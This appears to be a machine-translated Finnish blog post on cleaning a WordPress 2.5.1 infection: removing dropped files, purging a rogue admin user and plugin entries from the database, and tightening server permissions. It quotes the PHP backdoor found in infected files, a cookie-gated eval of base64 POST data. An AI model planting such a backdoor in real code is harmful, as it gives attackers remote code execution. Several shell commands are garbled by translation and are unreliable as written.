Ennen luet tätä viestiä, sinun pitäisi nähdä post täällä, Ymmärtämään jotain. :)
Löysin sen useista blogitiedostoista stealthsettings.com, koodit, jotka ovat samanlaisia kuin alla olevat virustartunnan seurauksena saavutus WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Jos edellä on noin tiedosto xmlrpc.php alkaen unelias, At grep palvelimelle, näyttää melko paljon tällaista lähdekoodissa.
Puhdistus saastuneet tiedostot:
Ooookkkk ...
1. Paras ratkaisu, koska se on tehty varmuuskopioJa puhdistaa tietokanta on pyyhkiä tiedostot WordPress (Voit pitää wp-config.php: n ja tiedostot, jotka eivät ole tiukasti yhteydessä wp-alustaan, sen jälkeen, kun ne on tarkastettu huolellisesti) palvelimelta ja ladata alkuperäiset versiosta 2.5.1 (Tässä yhteydessä ja tehdä versiopäivitys wp :)) http://wordpress.org/download/ . Pyyhi myös teeman tiedostot Jos et luota, että huolellisen tarkkailun.
Se on ilmeisesti vaikuttanut ja tiedostot teemoja, joita ei ole käytetty ennen blogin ja yksinkertaisesti muuttamalla teemaa, ei ratkaise ongelmaa.
./andreea/wp-content/themes/default/index.php:
2. Etsi ja poista kaikki tiedostot sisältävät: * _new.php, * _old.php, *. Jpgg, *. Giff, *. Pngg ja wp-info.txt tiedosto, jos sellainen on.
löytö. -nimi “* _new.php”
löytö. -nimi “* _old.php”
löytö. -nimi "* .jpgg"
löytö. -nimi “* _giff”
löytö. -nimi “* _pngg”
löytö. -nimi “wp-info.txt”
3. sisään / Tmp , Etsi ja poista kansioita, kuten tmpYwbzT2
SQL pesu :
1. Taulukossa Taulukko wp_options Tarkista ja poista rivit: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Kaikki in wp_options, mene active_plugins ja poistaa jos on plugin, joka päättyy yksi laajennuksia * _new.php, * _old.php, *. jpgg, *. giff, *. pngg tai jos toinen laajennus epäillään, tarkista huolellisesti.
3. Taulukossa wp_users, Katso onko käyttäjä, joka ei ole kirjoittanut mitään hänen oikea, sarake user_nicename. Poista tämä käyttäjä, mutta muista ID-sarakkeen numero. Tämä käyttäjä todennäköisesti käyttää "WordPress”Ca user_login on luotu ja näkyy 00: 00: 00 0000-00-00.
4. Siirry taulukon wp_usermeta ja poistaa kaikki linjojen ID edellä.
Kun olet suorittanut tämän sql-puhdistuksen, poista kaikki laajennukset käytöstä ja aktivoi ne sitten. (blogissa -> Hallintapaneeli -> Laajennukset)
Turvallinen palvelin:
1. Katso, mitä hakemistoja ja tiedostoja ovat "kirjoitettava"(chmod 777) ja yritä laittaa a chmod joka ei enää salli heidän kirjoittamista millään tasolla. (chmod esimerkiksi 644)
Etsi. -Perm-2-ls
2. Katso, mitä tiedostoja on bitti suid tai SGID . Jos et käytä näitä tiedostoja laittaa niitä chmod 0 tai poistaa paketin, että se sisältää. Ne ovat erittäin vaarallisia, koska ne toteuttavat etuoikeuksia "ryhmä"Tai"juuri"Ei normaali käyttäoikeuksien suorittaa tiedoston.
find /-type f-Perm-04000-ls
find /-type f-Perm-02000-ls
3. Tarkista, mitä portit ovat auki ja yritä sulkea tai varmistaa niitä, joita ei käytetä.
netstat-| grep-i kuuntele
Niin paljon. Ymmärrän Jotkut blogit ovat kiellettyjä de Google Search ja toiset sanovat "Hän teki ne hyvin!!!" . No, olisin tehnyt sen heidän puolestaan...mutta mitä sanot, jos Google alkaa kieltää kaikki sivustot muodostaen IS roskapostista ja laittaa troijalaiset (Trojan.Clicker.HTML) evästeissä?
1 ajatus aiheesta “WordPress Exploit - Puhdista virustiedostot, SQL ja palvelinsuojaus.